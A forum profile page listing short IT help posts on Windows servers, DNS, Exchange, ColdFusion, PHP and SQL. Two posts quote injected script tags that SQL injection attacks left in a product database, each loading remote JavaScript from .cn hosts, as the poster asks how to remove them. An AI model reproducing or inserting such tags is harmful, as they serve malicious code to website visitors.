Posts
 
Reputation
Joined
Last Seen
0 Reputation Points
100% Quality Score
Upvotes Received
3
Posts with Upvotes
3
Upvoting Members
3
Downvotes Received
0
Posts with Downvotes
0
Downvoting Members
0
0 Endorsements
Ranked #425

309 Posted Topics

Member Avatar for swpvideo

I'm going to say that's not possible what you may try is creating a folder with read only rights and hope they aren't smart enought to go into security permissions take ownership of the folder and change the permissions

Member Avatar for rproffitt
0
747
Member Avatar for Member #533276

Go into outlook -> file -> import -> import from another program or file -> personal folder file .pst -> select the .pst for that user from the mobile backup import it to the exchange account hit send receive that will sync the local outlook with the exchange server. Repeat …

Member Avatar for elis
0
382
Member Avatar for lich
Member Avatar for RaymondXie

what's the error? in iis you need to right click the website goto properties goto advance make sure is says default 80 leave host header value blank. ip (all unassigned)

Member Avatar for Muhry
0
221
Member Avatar for freshfitz

I can't find a tutorial anywhere on how to search a sql database using a textbox and a button in asp.net any help. I'm coding in C# Sql database has a customers table I want to display firstname and lastname by searching cust_no

Member Avatar for pradeep_skiet
0
463
Member Avatar for mitre

start -> control panel -> dns -> forward lookup zones -> the zone of your domain right click the white space add host (A) record it will append it to the begining of the domain name but if you are on that domain should still be able to ping webswepper. …

Member Avatar for vimal09
0
190
Member Avatar for freshfitz

My php code to read my xml is there anyway to sort by date or event_id? [CODE]<?php $doc = new DOMDocument(); $doc->load( '../events.xml' ); $date = array(); // initialize data array $books = $doc->getElementsByTagName( "event" ); foreach( $books as $book ) { $evts = $book->getElementsByTagName( "event_id" ); $evt = $evts->item(0)->nodeValue; …

Member Avatar for twiss
0
1K
Member Avatar for ITgirl2010

Where are you coming up with 421? A /16 subnet is 255.255.0.0. The ip would be 172.18.0.whatever

Member Avatar for Casper429
0
343
Member Avatar for freshfitz

So how can you tell if you've maxed out express and need to move to the full blown version. Not referring to database size but performance? Asking because we are moving a website and the webhost master asked if he will be on express or full version claiming that express …

Member Avatar for freshfitz
0
111
Member Avatar for freshfitz

Can anyone get this to work? You can download the code here [url]http://www.mattgifford.co.uk/sexy-fi-login-forms/[/url] but i can't get it to read a success from checklogin.cfm index.cfm [CODE]<!--- Name: index.cfm Author: Matt Gifford aka coldfumonkeh Date: 11/08/2010 Purpose: Login form to demonstrate the use of the jQuery UI's shake effect. ---> <!DOCTYPE …

Member Avatar for freshfitz
0
410
Member Avatar for Xodiak101

It sounds more like a home networking issue can you describe your home network cable modem dsl modem router etc and model numbers

Member Avatar for Rick527
0
271
Member Avatar for freshfitz

I have a new install of a windows 2008 server with active directory dhcp and dns roles. I have dns settings on the dhcp options set to the servers ip then the isp 2 dns enteries under that. MY workstations periodically drop the dns name of the server i run …

Member Avatar for cguan_77
0
139
Member Avatar for freshfitz

This one has me stumped I've installed plenty of windows servers with active directory. I have one client new dell windows 2008 server(active directory, dns, and dhcp server) with xp workstations. I have the server configured at static ip 192.168.10.5. Fios router is at 192.168.10.1. I have the workstations configured …

Member Avatar for freshfitz
0
265
Member Avatar for gfolkins

Don't think it's possible you may have to boot from a drive on the motherboard and use the raid array as a data storage only. There also may be certain higher end raid pci cards that do boot.

Member Avatar for Member #847675
0
224
Member Avatar for freshfitz

I got a sql injection hack that put this after each description in my database. <script src="http://b.adserv.cn/E/J.JS"></script><script src="http://b.rtbn2.cn/E/J.JS"></script> any idea how to remove it without deleting the descrition? Here is what I have HIM PORTRAIT SHIRT<script src="http://b.adserv.cn/E/J.JS"></script><script src="http://b.rtbn2.cn/E/J.JS"></script> Here is what I need HIM PORTRAIT SHIRT 3000 items / rows …

Member Avatar for ehotbid
0
242
Member Avatar for elmoualh
Member Avatar for Debodinno

Are you using sata or ide. If you use IDE just link the 2 with the same ribbon cable plug one end into the motherboard then the cable should have 2 more connectors one for each cd/dvd whatever. Make sure slave and primary are turned on in the bios for …

Member Avatar for ademoo
0
410
Member Avatar for superspamer

Goto the settings for abc.com and set the name servers as ns1.yyy.com and ns2.yyy.com

Member Avatar for freshfitz
0
42
Member Avatar for byallnames

If the program won't run as a service natively, then I would think you need to have an auto login setup

Member Avatar for freshfitz
0
202
Member Avatar for mahdi68

Why do you have so many partitions on that disk? Can't you right click an active partition and select extend?

Member Avatar for freshfitz
0
111
Member Avatar for freshfitz

I need to create a file to use as a template in coldfusion, so I need to insert cold fusion code to a sql database table using cold fusion or create a file with cffile? Every thing I try to use,it doesn't work because I think it is reading the …

Member Avatar for samaru
0
190
Member Avatar for sammansford
Member Avatar for 3eyedphish
Member Avatar for freshfitz

Has anyone ever seen this it's a dell inspiron laptop (sorry don't have the model) my customer upgraded to win 7 and he gets screens that look like this, We've uninstalled and re-installed the video driver 2 or 3 times. The only way to clear it up is to change …

Member Avatar for freshfitz
0
100
Member Avatar for jmflint
Member Avatar for freshfitz

We have this scripting working on one server and are trying to transfer it to a different server and we are getting this error the working server is fedora fc7 the new on is fedora fc12. When we run the script from a command line we get: web root 23:42:09 …

0
81
Member Avatar for fuggles

Is ftp running try: /etc/init.d/vsftpd start Is iptables blocking port 21 try: /etc/init.d/iptables stop Have you tried connecting with a regular ftp client by default root cannot ftp into vsftp so you have to try anonymous or create a new user. Look in /etc/vsftpd.conf to turn off anonymous access but …

Member Avatar for freshfitz
0
116
Member Avatar for exyalie

You will have to boot to a command prompt via the vista install cd I think choose the repair option run chkdsk at the command prompt and unhide the administrator account then try to login as admin run: net user administrator /active:yes

Member Avatar for freshfitz
0
107
Member Avatar for skipellis

Does disk management show a ntfs partition as healthy? right click the partition and assign it a drive letter

Member Avatar for freshfitz
0
164
Member Avatar for SpyrosMet
Member Avatar for SophieCharlotte

Look in programs startup on the start menu and remove the link if it is in there if it is not goto start run regedit browse to hklm/software/microsoft/windows/current version/run and see if there is a link in there

Member Avatar for SophieCharlotte
0
205
Member Avatar for lgonzo
Member Avatar for freshfitz

We just started a site zoponline.com it's been up for over a month, I added it to yahoos webmaster tools and verified the site but it has not gotten spidered yet. When I log into webmaster tools I see keywords "domain name, values, No. 1, ICANN-accredited, accredited domain name registrar, …

Member Avatar for infinique
0
97
Member Avatar for ukao

Not sure what gparted sees on a ntfs partition what is your mbr grub? What happens when you boot windows you get a black screen? Do you have another machine you can connect the HD to with a USB case?

Member Avatar for happyrock
0
135
Member Avatar for Syphilis

Need more info is this for everyone that visits your website or when a certain machine visits a website that you don't host?

Member Avatar for freshfitz
0
38
Member Avatar for MiketheBook

Yes the printer will run on xp in fusion without mac drivers. The same way it works in bootcamp. Also look here [url]http://forums.macosxhints.com/showthread.php?t=60765[/url]

Member Avatar for freshfitz
0
84
Member Avatar for ktucker

Is this the whole code for starters your missing the </body> close tag and <HTML> start and close tag

Member Avatar for freshfitz
0
163
Member Avatar for hockks

Bad HD or something in windows is corrupted. In th start windows normally screen do you have last know good configuration or safe mode try them if you can get into safe mode goto start run cmd type in chkdsk. If not you need an xp restore cd get to …

Member Avatar for freshfitz
0
61
Member Avatar for golfbear18

It depends on your rdp policy I set mine to logoff activity if left idle for Xxxx min. Also some policys if you get kicked off if starts a new rdp session but I can't see a SQL restore taking for then 45sec if being done locally.

Member Avatar for freshfitz
0
60
Member Avatar for leeZA1

I don't understand your question what password do you want to change and what are you logging into as admin to view all accounts?

Member Avatar for leeZA1
0
81
Member Avatar for cormee
Member Avatar for gurukid22
0
68
Member Avatar for Power Junkie

I had the same problem and went out and got an imac! It could be a few things if you can get into the os before your 10min is up goto start run cmd type in chkdsk /f say yes to the yes no and reboot, Memory could be bad …

Member Avatar for Adamsappleone
0
197
Member Avatar for compdoc

Lets try and figure out why it is giving you the message. do you have the pop3 settings correct you are getting the message cause outlook is connecting to a url that is not in the cert? Take a look at the cert and try a url in the cert.

Member Avatar for bomarmonk
0
1K
Member Avatar for mossman

Why are you setting up apache when you have iis and cf installed you will have to run apache on an alternative port it will not start on 80 since iis is using that

Member Avatar for utdream
0
149
Member Avatar for denny42

I don't think you can sum a table that isn't int. Can you put the values in 2 different tables date in 1 amount in another?

Member Avatar for milenio
0
82
Member Avatar for jackthechemist

The router needs to have a public dns to serve the webpages either set your isp's or a public, your internal network can use your routers ip as dns. If your isp changes your public ip then you will need ddns setup to serve the website if your isp changes …

Member Avatar for jackthechemist
0
132
Member Avatar for freshfitz

How would I clean everhing after script got a sql injection attack Electric repeater beanie green<script src="http://nt010.cn/E/J.JS"></script><script src="http://nt004.cn/E/J.JS"></script> need to clean everything after <script>

Member Avatar for freshfitz
0
103
Member Avatar for freshfitz

Have some question about exchange size limits. Last week a user wanted their send receive limit increased. I tried it on their account settings. didn't work. Then the database parameters didn't work then i did the adsiedit and added delivContentLength and MaxReceiveSize I think that still didnt work then I …

0
52
Member Avatar for mjhorn0

Start -> control panel -> network and internet -> view network status and tasks -> change adapter settings on the left -> goto your connection double click goto properties set the static ip under tcp/ip. After this is done you will have to login to your router and forward the …

Member Avatar for mjhorn0
0
136
Member Avatar for freshfitz

How do I set a variable in mysql database to equal txt so for example I have a table user-status which has values of 0 , 1, 2 or 3. I want a drop down to say if user_status = 3 display admin if user_status = 0 display no status …

Member Avatar for damnpoet
0
120

The End.